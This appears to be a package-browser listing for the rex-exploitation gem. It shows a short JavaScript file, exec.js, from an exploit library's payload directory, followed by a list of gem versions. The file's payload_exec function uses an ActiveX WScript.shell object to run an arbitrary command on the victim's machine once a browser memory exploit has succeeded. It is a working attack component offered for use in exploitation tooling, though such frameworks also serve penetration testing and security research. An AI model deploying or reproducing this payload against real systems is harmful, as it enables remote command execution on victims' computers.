Sha256: cfb489a71c973f073ebdf8e23154a66a48ca7ec1779e532eba22fb5555aa1f8d

Contents?: true

Size: 173 Bytes

Versions: 41

Compression:

Stored size: 173 Bytes

Contents

function payload_exec(cmd) {

	this.execute = function(explib) {

		var WshShell = new ActiveXObject("WScript.shell");
		var oExec = WshShell.Exec(cmd);
	}

	return this;
}

Version data entries

41 entries across 41 versions & 1 rubygems

Version Path
rex-exploitation-0.1.40 data/js/memory/explib2/payload/exec.js
rex-exploitation-0.1.39 data/js/memory/explib2/payload/exec.js
rex-exploitation-0.1.38 data/js/memory/explib2/payload/exec.js
rex-exploitation-0.1.37 data/js/memory/explib2/payload/exec.js
rex-exploitation-0.1.36 data/js/memory/explib2/payload/exec.js
rex-exploitation-0.1.35 data/js/memory/explib2/payload/exec.js
rex-exploitation-0.1.34 data/js/memory/explib2/payload/exec.js
rex-exploitation-0.1.33 data/js/memory/explib2/payload/exec.js
rex-exploitation-0.1.32 data/js/memory/explib2/payload/exec.js
rex-exploitation-0.1.31 data/js/memory/explib2/payload/exec.js
rex-exploitation-0.1.30 data/js/memory/explib2/payload/exec.js
rex-exploitation-0.1.29 data/js/memory/explib2/payload/exec.js
rex-exploitation-0.1.28 data/js/memory/explib2/payload/exec.js
rex-exploitation-0.1.27 data/js/memory/explib2/payload/exec.js
rex-exploitation-0.1.26 data/js/memory/explib2/payload/exec.js
rex-exploitation-0.1.25 data/js/memory/explib2/payload/exec.js
rex-exploitation-0.1.24 data/js/memory/explib2/payload/exec.js
rex-exploitation-0.1.23 data/js/memory/explib2/payload/exec.js
rex-exploitation-0.1.22 data/js/memory/explib2/payload/exec.js
rex-exploitation-0.1.21 data/js/memory/explib2/payload/exec.js